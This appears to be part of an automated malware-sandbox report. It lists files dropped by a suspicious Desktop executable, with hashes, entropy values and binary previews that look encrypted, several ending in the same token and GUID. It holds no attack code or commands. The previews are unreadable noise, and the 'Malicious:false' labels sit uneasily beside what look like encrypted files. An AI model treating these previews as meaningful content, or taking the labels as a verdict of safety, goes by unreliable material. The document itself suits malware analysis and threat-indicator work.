              Preview:<?xml.............I_i..9).c.j ...9...v!..%QT....O....;.;I;..5*.,..s't......&..r&.'J. .'#.T.A........XA..w..nL(S..o.O..'Gl1.6...k..C.joM}.......fdA.*}..R.......B...h.9*...c.......V.r.....B...d...j.U....Sq.... ........'.s.......1.c1O...W....../'F.&.F,....'.k...6.....2E.I@.w..(..S.U.Z5........Xz...P..f+OzO..S..MtV+...g......j1......=$..N.~..N..E.....L......wJ2c^....5... .P.h.=..&......N......y...q"W.".._E..,"......1af.=..k9........h...7.B.t...d.7.4.`.]..y|,..Y.Y....t....m.....0.C.b..])w!.~C.S8S.:.]!...#Y.b#..=^.s...=.]...C..H+....b}@4.Q>W..C.{Wt|..Q.V.9......D8$...Y.;>....wrFo.p.j R......~1.........Y..?s-..z.....4d....g.|n.1..Z....."M~..... .."..L...##@Sr1Yo.P.D.....:.]....k.v.=.8{V..^22..m..i..x..9...X...e.OVM>x.=.?#....$.r..[..2..T..[l/..Z...~.qFx.....UJ`........h:."..t.x..Xc..`..P.{..t..q(?:.W.a....zs.'l....m.w.rQ......u#`.......'.....=...8C.3).5.{..4f0.P7...<....9..u.8...s..G.p.......k.i.S..=.p.<.&.p.kQ.^......n.o....... .*....u.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1846
              Entropy (8bit):7.882905207678316
              Encrypted:false
              SSDEEP:48:eUoKlmgf1ZQEzemhDi1dHlNIwRbeZWXAKuS7ABVhp+rD:UKoa1ZQyY1/NIeZuF5+H
              MD5:8DB1345F08A98479E3734EC58E59670E
              SHA1:8D52D48FEC83E7976519BF00125B4E46ED385882
              SHA-256:DA49E48C75582C8F95DDEA8ECC78141C114ADE4AFE1457EED437A87B24596696
              SHA-512:547A98232027663487B9E6B998CF2A1D20BCE374898F517191CF5BBF4A5B2A0B6EAAE61CE80FEB6C98EC14D0D45DB6ECB4B6BCEE67DF29994473F452B654B2B6
              Malicious:false
              Preview:<?xml....j.......@.Ln..DE.{...A..3^U..)9D....g.(.4.x....0..ck.L.H."....Q.6........).,......Q.ut..o.....#.(.z...5`2$w..:.).:A.N..m....]>.(...>=.x..G....'m....)M./...D.s..%..W.@..J.3\.O..S=j.gD)..OB2.b..bz.&...T,0..b..eLg.$.......y.n.f.....<...;m.....p.........AB.U.e........FZiN.."..`..+.A../....Yb.rp..\.N..2..|P.X............yc..2*."*..mf.._-\..=...Q1..........<...w.........d.U.X....g.m....._.........6.%....&U..&.Q6...Z...&H.2..*.xH...M..x..pJs.;U.D.......on.....b........gAD..?..]....E..;....l.1.UV...f.m........#[..+........./.......jn..Y=.W..E...../.U.T.|......|..........I...K......]M.}.b.k*.uc..k{.z.....aU...E.=p.U.[..5G.l........$.A..........].5..K.g;.pX.?J.c.l..qI^=...B=}S..R.O.w.......]R.....!,d*......~..7.`J-.,...U.(n{%.V.$y...0G.=)......;l....I...z...D..G..&'^.+....F..p.u<.TN......$.9....{.b..#.twoa'..t...I..?.n.....\%....S...T*'.5.......`.f..:WB.;>k.^"{lw.....^`..W..'......>8U4bS.^.....o.. ..E.B}.....D`..I....L......=
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1193
              Entropy (8bit):7.826907596317687
              Encrypted:false
              SSDEEP:24:aDeg31obnuBw+n/aiRdOLyx2wPErZFemaI473RAYKlqmTX2mhZbD:aDjoUwuNOS5PMFCKHlxvD
              MD5:858A03BDAF760E4E5002B94443BB9899
              SHA1:4EE70CBF6B9472077891725DC76CE3900BD2704D
              SHA-256:55935B4DFB0080092CAF87ED8CA5A9758DCBC4CDF9374F5CC6FEA900300B9B04
              SHA-512:F2C579B71A65864B826CC4B719D70548C0ED1743A4806F33E9934012EB89426DF10D2245E6F35C033F2B468825339C38CE30D13A7922FDCDB367815CAAE7A820
              Malicious:false
              Preview:<?xml.....V..F].\U........~....N2r..9.M/......#v[..Z...6.2.e-H.P...9.%3<..J..u.....X..h...7..pv..X.6.....f..Z=#Pt..yc`..*...R.*}......v..wM...G/..N.......{>|.+1~..]6.r..n...)...-8........].......1..q.....N...s&.'-k.F..s...5..S.Ru.)..?.J...`v..[3............+ ...h....(1.Be@I..5....w....V~+B.7...UPByb-...._......q..........P.p......?v.P..D.$O.Xwy.E.....X.ug$WFi..p.+@.H(..D'P./...r.....F.Z*U.........c.r.df...L....+.D..V?.s)..6..0......ST..*".Vo..kM....'..H.)..:...R.\g.W`..n.S.zx.6...:......y.e=..x]j<.p..r......3y.]fe.p.....T..y.+?ei....p.....p,."Y.2\.......%.....~.w...&..TK.)7..^.6.34.V..">.....x....q~.M..../....=.M.<Wy.U%.j..e..<}.0hj..K...*..8...^Hm@..7d.iR,Y..6Vt..i..V.Y.9|....Or..g.=.}.U...f(u&T..._.=......u.........j..m..@.2.*{0..hf!y...b...[$.....e!...rj%.V..x{..w...Q...h..=]..)......GZ......s....(..9..CW].Q+>9....A. ;X....S..=........>.D.A...#.W.X.j.i..s........$e....n..m...f...'.t.........ON........n....T...v.....}N..%...2.|O.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2371
              Entropy (8bit):7.903091756166728
              Encrypted:false
              SSDEEP:48:4eeTWHtObOs2U1NZZlelq7kYMIycG1gEMCI2xMj8HP785+Kks3h1C3G+WD:4ZSvU1jZeq7kZBgEMCnpD+7BzC3hO
              MD5:FCB7DA83C848B04D0ED051FE26CD1D2B
              SHA1:96A4F73DF91C8E713E2D716EB3153473720D9E2F
              SHA-256:23FCC8F2A283722D197516E7721550D0D929ED31D722D6F0ECC85B27291E920F
              SHA-512:557A53B5BAA0314E405951FBE5DF655513E2A9482B41F31D165033B6647AFD9E94CF5664EFA7D567168695845A468B6834F4241DCDE33D12787A62BCA23BD4DF
              Malicious:false
              Preview:<?xmlh.....t.zs.....B.~..|.{.^.{q......,....M...u..w'14.C..)..4.....{.-.}..p.W.L...@......dXA2...<&..H.]...Vjv..7.;.rNz....c..%Qn.Hm..C..u..Cy..Y.Y.....>..|k.13..a...0.%_..)D.^.a......Cux..j)8...?...x....SGT....8.....,.....Cg.%......SFV'......z$.. ..&..c..-.-aZ....*x....A....., .PYLy8..2.r3$.m#.m+p......;u...~.i....%..A*y..)...=#r....U....[.K..]..8...p.E.n.z#p..p-..I..d..[..o.8...L.2. ..l....&{...Z.....J.P.6...@..*r...`.8d9.H.....5...2.n.y.1.cTz.1l.Z..)..u.q.A9.r..1.Ag...?mR..>.d<...Dm\.!2Lt...G....Q...F....s.z."...v..p.O.o.g.n.;^.fU..........i.].%..4.Hx_0.1.bU.E"IX...M.a....q;..z..<q.....d.D...$.@u.H|.#.n...C..52.>.,......$.....7....yR........].~..k.m...:...o.7Z:k..\.....=.b....XB.,.@.:~...[...Y..O.0.w.p..Q....+a..|.|.B..@?t...J........uP..,%/;:..<hv..D...T...z]-.~ E..e5..he.......}...r..i.B....Y..4.e.....L..*.M( .ZE0..w._S.._.m..l....j.$......%."^).-4J....[>...+.;l.?/......u..\...*..e..4.u{3.;.Nu2k.m..........]t.x. \..tV
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.740693975193248
              Encrypted:false
              SSDEEP:12:l9yKK9+EaXQzoTl5WRWpaAXFqFyY44KruaVd9/8mHdSMVHgM7SJ+smemUukIciik:lMKs+EPml4wa44YuaD9/8m9rhGQs7CbD
              MD5:B87DC3CF25656B7BAF3800B1999024B0
              SHA1:545B14C2B3366CB5527820BB5B6085214387054C
              SHA-256:D394DB7C0A504FB001ABE0EB64575386BB243256F0B457093BBFE9F0CA808C20
              SHA-512:F67AFECF0B82D2696918DAC4866399D7493E3E10DA12D19F4B1C9AD567B5532FC7BA792A6C55B56D527C8366D881361072FC1AFCFC0B99B82F2E81C1D9C46922
              Malicious:false
              Preview:<?xml/......$.-XP..{`.(./....P.k.*....bXR.e...V.U.tO.....~H..x.o..a..8.q...bYQ.g7.u.hr!.....A...jZ4.....xu.hh@P...C...x..../2.].e71c...4.....:|..4x...P.t.2?...3....@...J.i../.....'.3....!.V.1[p.5.E#....e.u.....}....@...$.....J$....,...e9......N..."......TR(^.[m..E>.].....u..P..-.Xz.|..AjN.'}.cC}.W.....8.3. Lx P..,Sf..r;Ju...}I%@..w..S9......v[?.^XjR..X...;.,pG.w%...<..[._>x.......L....{.0..=.C..Kq..a.*!...96.8....r..0v ...."8.,=O..x/....hF..J.RD......{.......f...l...A>.f.....9...c.....Rf.4......#A\..#..7._../`....T&y..v?~H .KyI......."M......o...=.gL..yk........`.LO8j..d.k\5...MK.d.fzt.n.N.l..S~......Y..*?..'V......(...^.y8h:.$...,..Wftp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):816
              Entropy (8bit):7.70987782630449
              Encrypted:false
              SSDEEP:24:2Ulcfoc91FcO3rIzaumEXaDHIQFTVxl2XtiO3TxZbD:2U+sQrINmYaDHIQFBxUXtiODxZD
              MD5:32CC8629E6C4696B0A5E22788FF18C17
              SHA1:19DF630821E9C09A72B531F1FD1436990A6D293C
              SHA-256:C4E6AA58126B598C12819847DA29A806E06F70D5C28987FE7C64386E425D3A2D
              SHA-512:F04FE9827C4B00DBFCB224A825F2A0C1C683EF8F633DFC0799FE659B7DDD77263E34326257982F2DC05A686377571967F3C486517B1762594F9D55A6B60648C2
              Malicious:false
              Preview:<?xml..e....b6Av....8.....g+..d..g....-..;.....i...B,..V.0.#..'...|.}..1=..d...,.&.Ci..rr..qN...y..p0(...f.A.4....eQ...3c.{!...>>..C...2oO ...>....f.D1tAmh...e...n..&.%^.v...*.....|]e.C4<.(..(.#...<Y..-.r.79.,...:....8o...^.55..).fZVJ.......b.r.:>=..T B'.J"m...w|.[...;fQ.T3....Ei\.7...>e..4.....z......K|`.b.;L.Z0Y.m.:..............iS.7..S.Q$.Q.....6.]..FW.*.....C.....-.*.....+..Hk...E..]y.Q..b....)...-.[... .9.b.|<.@..]..%S1e..W.......j.B#&.w...s..v.Z./<...A+..(.D..<..f...._VsA|(...i..^.+.w....+......g.............[G;.L...@.NTP.N..............,...`../.4.o...Vj{g.......Tw .m....$;. ..........x.{j..u...j.'..=...p....!B.C..;.Ma..y.(....`.u.K..4.X...r.j. ....]{....z.~.)u.../..J..\$. .....{.W...7.Rtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):816
              Entropy (8bit):7.701969954882052
              Encrypted:false
              SSDEEP:12:UUbm0cs9D6LwXAQ40Mr5YP2d+0ySHdTtY11M7iMls6ifVX2nZq6hukIcii9a:UUh/O50e+fSFtYfI6cq6GbD
              MD5:0FADB71909E98691B00DCDC6ED9439A3
              SHA1:4CD1BD7177AA1E9B0B93E8E490033D05E1E91A02
              SHA-256:F94530BF2B1C21028AEE5474F39C8876637CEE7C58F38BD1026BC8B870541E03
              SHA-512:44A15B02F772D44955D4DC62B9B344915145BA4C8C44C68661CD10BD78CF5402D9681739AC8E11FBA486CC7DA970C1645F4633D21CEBBB1D9DCE8BE5A53FE7B1
              Malicious:false
              Preview:<?xml............|......pU....q....5......0.].1..9:...4.I.(..$'.D ...F..O*..1..D.[....P0.../.1....P..e..9..t..f..Z..0f...Msd|D?.Z..nf..R>0...1...U#+.|.%A..L.aL".M...I.?rD..Y.~V........H..-F.RXEt...-.ct"........48.a..M..2....<.d.7.Z..KX.!m.(V5...(.2....2....J.......M....z.B.X..L&/.....]AD,&.n-...y..5.1..i....A{o..$!.9.e....u..C.3.v;.k.r.K!../tv.z..d.$.....DP.R.Z.1...l.....i..3/.7.A.%.2...7...VH...........AJ.s$.[.R$..D....E...(U..a....UZ.n.1...8h.".....y....c.Q.....1....-*K.c..M..N..O...j..@A..6.\..e.....#pn~d..O4...D......+.........W...M.U:...~.o........O.....B.....!y.s.....3..v.A.Kg..)r.....L.......4..x.$x7.a...b...<O..%.]..X...n.KL. .n.YC.}.....M.............7.]$.}.k.Z.WO.v&J.z(3yI$S....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1494
              Entropy (8bit):7.8676246369025
              Encrypted:false
              SSDEEP:24:bFWVukWJeC1attId1cm+0Rd0O7tG9GTk682YHB87eiygywc5AGKJ9HDju+5dNbD:bFGSaty3D+83MMTk6nYHBbi3Vh9jSWtD
              MD5:FE131B42C30F431D432D4F2F5CE0B6BA
              SHA1:5C71B55346F9EA1747F38E0A4E6E5148BAC047AD
              SHA-256:9097C2BC803A5BF970D5F7D07477712042EF15D52598F2B7BE6788D10C2DD8B6
              SHA-512:CD45A0C8006D7C6F658E0C07F1B66F409E4A635A700E331F1754104E587170AA87C04675C84B2B629120593BD406BF8847708A961EF01FA73A49B65428942519
              Malicious:false
              Preview:<?xml.3.^L..>...d.......T........f..G.....t.,z.=.@cp0.....W.GCN........T....U.Ja.B.......N.V"qfr0.3x...c+....E.zF.%Jn..w9.r...I.%......T...L.\.j..&.~..t.s.V.$q..(.bE....j....h..I~*o~..........L7....1}.S..<.W.[.#W ..k.k..*~3...f.."...%...A...:a.&..WYT......7...N....W.5P%cg<E-2..`..u......J....1..[...]h.....c...[.1XO.+.$...............@A..(R<Ln.N..!.9....$.A>lX..F..c&./..F..i..g'.Y.jr..I.q.<.V....p../J.......=...%....5K.{.,d.h!"..6e.....k..2jK_...K6......i..R.Y8.....m.'N...1Z.K....`..:..Zf>..=.I,...=..xR.F..(.r.|]<..2.9..!UL/.i.Y.Z..1..34.....y...2=..9.....xxtK..+8..J..4.....k.V*C..m.F..#?-=....W..;OQzH.."..:'9q..0._.p<(W.'..BM.r.sPO.P...f.$..1..U..d..)....b......(d.......,......_...'Zb.n...W@..fP.B...5.....Nn.kVb..N..>R.C...../.....N;.).{...O~.-.=.}O.n..2...qU.)..w.|K.".....M{.<....U..G.*2,dYGN.]...)a.;l26.x.._..}..6.RA..J.zL.sd...;......+].4...K.S6..Xt. ..i...".a.G.[...t......!#..X.B....?..._B.....U..)p.8z..!....=..Ofz..e...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):838
              Entropy (8bit):7.748518046810887
              Encrypted:false
              SSDEEP:24:KJPeQ8ODpLuGY/qhH37CTb1Gwm2+LQ9hZIo/L8ObD:KYTODNuGTJQ1Xm2zz/osD
              MD5:704DCB071692CB3A40B0B5C5117C801C
              SHA1:7867D0108F002B8F45E2EB3469F0F6E8DEC13BE8
              SHA-256:B28834718ECC317967FE65EDBD181DA79E94EE5930E5008ACC071B541CADAE56
              SHA-512:196CF42FAD1E8D89C427C77440E50AFC8254C0D04AEE348045B7C79CDDF0B37E69B92A88BA1DF2A1BC575A2165E1D9CF4D5D9E9FEC9729F71144D156DFC2406F
              Malicious:false
              Preview:<?xml.w(}..."...j....e<HJH.Q.H..)l.......;!..bd.....>..9"..ds.....IE..JKZ.&.h..\...y]G#....?uMe\.L?...J....nz.)`Q.J{.J6.....b.7S...@.@.......0%.coz.........>..).f*...U.....2..7...Y.L..X.U..r.2..`]........32_j.J2`Bu.f..U.u{y4~..%!}wo...@K .....*^vb............{..0.B..6..Hl.g.?.N...{..p!.AA.T`P/..;...a../g......!..1U..6*L.....y.E...l...........R.......v......g..i.F.W.QJH.3......MOn.....d.2..m.O...O:.A..fj.\.d..d..``.)!...............K8.4...o.......P.......+.=..BG.J#..~......SB-7...;..k....f.uZA./.p...(M.h....,.Nf.}..i......)i'..b`-`..:..........1.._...;."...v./i.t........~.o*..#....S..4J..."43.DVU;....6./(|."....).B{9u..Q.W....B..|6..c..0.T.gm..1{..=x.:P..+NK.=.]....p..9...&{.............jeLl2...L.....z....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1163
              Entropy (8bit):7.8223582646629
              Encrypted:false
              SSDEEP:24:7zfFRwKCJdJs6rRnjmz/P8WavgABuf1TBf0+dhJzhTbD:XdRwKCJbs+RBgAQf1JFhJzhHD
              MD5:BC89332A1E933568043DD6EF3D1CE628
              SHA1:775E4053DC46BAD3D55AC1F4D3D4739D9980FA76
              SHA-256:848DE4BD990A054472A49117998E115AD14B56FD2DADE3A35E8CAED9D002345A
              SHA-512:30B34DF41D1A34A7CCD904D8E69F36046B4EF1533AEEBD976309B7BF6BFBB8E91E441C8873F6493BF2900E894F015587D4D73B5BD01C3A18479DB6B5D8E279CB
              Malicious:false
              Preview:<?xml!.[...../M..*'....K.!].. .5.....4J_.6.....,$>./.#.v.;.....o3.Wz$..f..u.a.t.1....V..f.7.7..."......Y*..<.S_V...$f..v0.]]^9u.{n.....t.....QA..+.N.6..a...-...;..h......../.Bo,......5.*zB.fZC.n.`.l9.)'LJ...<.y.?z..i.].l....NaU{.......x.T.....r.c.....e..yK......_U{.._.<....=..!5......M..&>....f.7..%Oq........Z[..J4..,.....<.g"...9.2..M.n...=.h.V.m9.C.Y`{y3.(..N.{..)$.H....eCk.b5....3....4....x..k.......G.....e........6..f...4..>..t...).'AE........v......g{.tn..Mc4....c3..e...NTab..F(.y.M..E]Y.MAGumW.Uk..E.w"x.....9..Wh....0.#....[...2..(7...]..T.j...}.H.~!K..1.V............6M.L..."-...(..f*u..oK........r..f......fb..X....]...o.\...@.*R.X.(".n....:%..o..K..x......H..(,.|.[...D.:..:t x...U.J...i.T..##m..7d.w"Q.r....s. 0=}..Y.+.`.i..V....u.S>....".Y...!.0.i... #~..?..~..WBb...tD....H.qFa.|..3.(.F..R.."..{..........G..d..(....<...........7....5qd).U+.."..W..g.xnLe.....d .-.>].B'#i.......\_..-vz9&.m\..V....84...D....Ou@l.S..$./C..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1146
              Entropy (8bit):7.805060037360267
              Encrypted:false
              SSDEEP:24:SjLX8VvcFVrP7FQpqtgYQYxwkz85+PFuGeSe4CzSRRsr0eQmCbD:SUVvqBQ8dQ5UaruLNmQD
              MD5:E18BE72A79083FDE288E91A4B8380852
              SHA1:A4C7D6564781A1E403DAAA1D7A26BE0B17798F0A
              SHA-256:1F5EBA09636ED7ECEB494F4CDD12E14D01301E42B21E2C2DC321B4C6F188429F
              SHA-512:EB844407717CB0312BF0932D0F8A1D47D63E6C4AD7289A297D563338609B515505ECCA3F475AEB291476FF631C12BF26F4A66394B032D52E386AA79DD4C3E051
              Malicious:false
              Preview:<?xml..H&.kf.f*NEk.#.G...S.B....a.4....|.],`p.2.e.F0.W.Dm...yv,.F.C.u..g.9)..._..5>z-/.(.U..^-h....R.?4.@...MG1.c.......p.G..O.4......S....;.....X..jMz....5.P/...v..j'?.y:C...`'2.....8hD.7_._...x....9/e..W...:b|v..G..&+8l......>.O.L........C..2.z...`..q....*.......@X...;.:...cXH.H...T..2......Je'.M.....TY...V.[..8;..u..vP=.p.Ca.!.w.7...iV.....?.A.w..~eC.Wj.\...^.6..)T,..Pflg.........A..XmX2...u...hfC.^..A...........J..2p2.>...Y.c,.M..?^...._...5.Lx=......C.<T..F....Mu.........e$N...lx..^c.K.f.B3P.(....`.$.!.<u|....<m9Y.yX..-&)g.f..-..D..{.d..-..%`.....q..&XC.O.RJ.f.}......Cb........ /....7.O.,......v.v.hk.<5..P,x....S..M..f..s.:7C.hc.{Yc....i.5..uSq".tZ.;...\.....Di.x..O....on..{.@.mWK..,.._..xe.......N...2u.....sz.3.@.....l.; v.}.....le!.........3....f&....h.....-F.2.!..Dy..j...~....%.L.s.....+.9*.l..3.4zu.?.K.K..8.q..9...e.....f..Q.....E.)..%8.............@..}...c....zY.n.~..S..<z...v@z.wI..Ai.......J..\o.`...Y.9=l......_.W..0..i|.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2797
              Entropy (8bit):7.940252120981605
              Encrypted:false
              SSDEEP:48:OUlVyLxE0LShqgO//A42TVDRclfKFJGp3YOqBf1yWOFAGxM/M7+bTewhD:OC2lgw/UDRIIJGHqBf1vCDM/rP
              MD5:6EE7D00E50DF2C257E0862947FEA31AE
              SHA1:87E4896861B2E032E8126177832C9D47B18CB94E
              SHA-256:8163F4F6B8BE20F4C79891E270246DDD9C34875955426FDCC055BA949A7CA6AA
              SHA-512:94A3DB9F5E414D8A2B3C926C6D0E8C3353985549BF1D0583DE77C4CE611C462FE582FA5CBDACD122BAEC0F153412E8BDFD196038EFF2DD0852CEDFED54B4B6A3
              Malicious:false
              Preview:<?xml....=^s.7..i.zgjF..6...%...5sw.a.f..q.5....#[....x.#.^1....w..,..=.b...EPX..^.y......YU.B.!..=....X...R..Dh..T.T..=..o.. .({.Ad..t.?..Q..j...B...-.:P7...+....I.Gt..>-.|...,|.P.HjR.....2z..U~..?t.......qO.S.R.YE.;=..5N.8.e.._.."...y..........M;Q.a7E..> .)>.45.>&.,....D....._!vy..1....ae...v..cU...9..).cy.....%..fe.......'. .N.7&,..o.0.G;.zl..O=4gQP.uE....s..&....M.;...>....I..~C-....].j..V..:..>..i.$...}W.....B..<..@.#..7....]...M_...(..H.Q..f...x...\!.S!.5..o.)...l.......-iIj.PL..(.."t..O............a-..w...Q5...3....u.AM.}......=........}_@kh..--.=B.y...CY...u...p.....hL..JE..q*.7..d.kE.X.a#Kl!..c\._h.fy.[h@.y.Y.a%.../`.:.{...&|.K..]A......7(T.....7#....Z...Tc...T....R..H...:...0.....B.....5.G>...O...c....ot0.......#........."TIx.../...!...._d.w.=.p...He%..A.\4..EX0.........Q....... R.....).i..."@...6(..O..M./..-h.\.B9.........q.I.*...K.jFn.`/.F.T:.. (.<vo.....H......B9..8...)|.C..!.d...\i.Jv.v..........i..p.\......P.\.r+.2
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2255
              Entropy (8bit):7.922335707251439
              Encrypted:false
              SSDEEP:48:gCyXuq9hS6uxnnYcB9dWbycO3VVooB7vcPUSeD:yXrDS6TcBDcZEVVooy0
              MD5:9374B9E95DDFF1FC155F72D4611B2426
              SHA1:3C32FBEAA00C6BBBE5A98994F6EE9629EF9DFD0A
              SHA-256:8FD10DE88366D0DE906F2F44D3CFBBEEDCC9FBD61BBD99E1B3A2ACA76C844373
              SHA-512:2654FAD9178A798573887802F3F29835B621F92B51A09B71CDC4AB0DB8263E3713E95188B760CDEDDF8206799A5BF0069A39EC85364E4C61FA0D505FC5562B21
              Malicious:false
              Preview:<?xml..piQZ&!G....h..M.....=.....hC...\.U.a...'......L.kA....Z..!..|...0g...h.a`...n..w.Q.Q}.$`01T...G.`WQ.J.!.8.#6.,.ZH...2l.. .U."v..Rre.n#.........6Ts...C..[..*=....L.b.w^.c...#.>.CaQ1.C.f.E..../g.K..,..@...ohS.4.k1c.R...4[...4VE....8=..*ms@...(...tr.SI.0U.....S...+.qj.r.....@. ..x?......AB0.?..5'`.w..l..>..6.6....l..7:....RU...b+*.q......c...g.c...Y....V.?nj>.L0..}..R.).%D..N~.,i..T......oV...........R..J..[....0rG"n.N[i4~o......G.....>..R..'.P....6... ..)...Y....... ./..|[D.dJ...!.km"e]f.......7.y..ri.}....*...4...K).E#.......(..v..~....G0...)....B<2.:.+j....i7.y6_.....p1>i.....E.,......yjCN..iY..<hX..,.W..g[+LM........$....,..@.)..D..c[.~.....k.Y...|..c.7...a.=.r..E:N3..E.@..h..V......fMo...>...........&3eqv...bm..:..c..f.T.D.D:....;.......w.5...l$.t..cW....F.....A..N...[..a..v~..?.L:.....V.P.7..q...{....Q.W7.>U.3.....9z..|V...P....S[w...JQK....N Rn....hm....0Q.H.|........I}.vp..#...5KH...."..K.:.O.H...*.CXb...b+%.d.^.Y......E..".5|Pp..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.87725265135129
              Encrypted:false
              SSDEEP:48:IaPmss3Iwrh1dPyyOsxhuwACtNUANqsvP0D:IUNsYg1d6oupCbHqsv4
              MD5:73A2C54FF6BFA88118A84B163A7C86C6
              SHA1:2A8B8EA05AA473830AEC79D91D83352DB7A4F12F
              SHA-256:4912A15CAA856C23914A8277FB75295D460B6CA5E1F5A167ED97DD18E4B6E7D7
              SHA-512:5D4495BDEB1BFECD6B1F83624B20F6BD2184507C033DBB24DB778320F6A958258471FDAF358F38F5BBBDC5CFBE414FA0B4178E1523D3A048AC0B2DC27B7D2900
              Malicious:false
              Preview:<?xml.....>..7qA.I.....op]..Ya..lA.C.....P9..W...l.m....Y.I.w.st...n...X..}......p}.\.).....}.,.VLON>.O>..W.K....zDoJ.9.FdX/......}d.l.....Bz..qkE.(md.....I.\/.;Y(...>.;..S.".4.....Y.hF.....\j....?...O..|......../......'.NS..,w*.QX.G....b..B..z..aA/..uj../Jz../...T/+.h...m..&.@....=;f.=.[`}...k....E.3&.g.}...T.y...&..hn.0.N....C7.$....An..^]...C?.... .......Gj.z.v<GE.bA...,.+.x...n[....8..Dc........h.[W..........F...CC.2....@/o.1l...4Vl..u.0|u)..Wg2...UE..1{C./.B..>..P..ERR8...<..3.9."(Jc...a.....y?$V...,.R..TI.2.....w...UD.y.+A[:.H..fb..~.{.G-..mWB.q......*...9p[...*.).....D...A.<:...p...K]m*v.H.G.B... ......2.........[@...o.........w.`.O.~.P...!..<ooB.v...UC#......L....$I.Vp.g....\....W>.t^J.(..F..K..re..>..h..nq..r\.rlx.mL..Fi=6.8e.P$.e...Wf...6...I..*..w.._..}..dJ.........6e.&.........>.#W....#.B!.F..c.Cfb..W.y.(...S..(v..v........".v[...OV.;.....D."NYd!.....S..G.|..Q.b..jv..A.>..Z..j..'.w....E.N'.0+..x........7.m...v.3.G....j1.#...L0.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):776
              Entropy (8bit):7.7167548846004435
              Encrypted:false
              SSDEEP:24:OM5Xih7xOO2sl3yeqrnCZ3d7HDP819+yelV7bD:OM67MCl+rnCNdDDP8mtlV/D
              MD5:43A550A846C808091F7FC045B3C75816
              SHA1:882830C7EEEAEF4864C1AFE7D98C226B0A7B357F
              SHA-256:7B6D0E28D4A1BC13B6A12B3835F4719ED3292BDB75B3E53E9018A88F08F7E5F8
              SHA-512:E34137E08A9B4A8E25CB79C360FBC506FD3157F01A66D001322DD8236AD0CE07AB00C21CCD314B6C575E405132430203B13073D3050982F5A2AFC97B3D8F2FC2
              Malicious:false
              Preview:<?xml.MeI.]w".Z.q.=..f^f..)...Vp.....\.38.;......E./....q.D))..G......W^U...(...Lk.........H.....gen..E.......b..F.1.X..e.....,U."..t[x+..J*v.>h.....3.iL...z.-.l.....p....R....J.~..0..U....1.%]...DO...c.x.+"....P.m....%..M.p4.x._...^r.am.I......*X.....[....5=!.;L.j6_Q,A.<.....O.....]t...T5Ta..B.O.H Y.gd]O..s...&.6....c.....J^{...ij.{...1..C..,YA.....O;.&{...Vo`(......_.)$P......nL(d.>/..1?Tw.X......}.... ;.xL ..gP)...U^.?.W.g....y...u..8..)Oq.;..37...L..n.C......7.....5}o..{+.",.5;.W..m..m....}L...q#.....2..l.=.....D~.g/......B..N@.;.]......u..Ma. .k.f..OA'.~..D..v#[.@.....sl)C-..d.5ih.W.....Tb....ZEM.}&f....-.w..0...[.K...E?)$..@q..C5...v..5.../.S....3.u.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2617
              Entropy (8bit):7.927155473604697
              Encrypted:false
              SSDEEP:48:vPA/+y5hH8J62FxkAhvwiHAyMMwxQmd22Su066QK8c5QhFc3NwSmY247lwWXYlmk:vo+6O62F/hvwCMi2SC6r4FUwSmY249oz
              MD5:02E910AF09863865E0058FE1D1D8B507
              SHA1:CB1A1028F875BF81F0BD5467F709AAE91420CCAB
              SHA-256:273C404155F71A03E920916D185AA8A043D3B4F1AAD24570EE6801847E642FEC
              SHA-512:D64A97195AA2C31824F98B6EC77D595F84734AB663DD1667B94F153B1AEFCB11033F4C098F5BF2EDE86982A4BD0FB3B45DFC220BE7FBAB563358DFB4E84F1E84
              Malicious:false
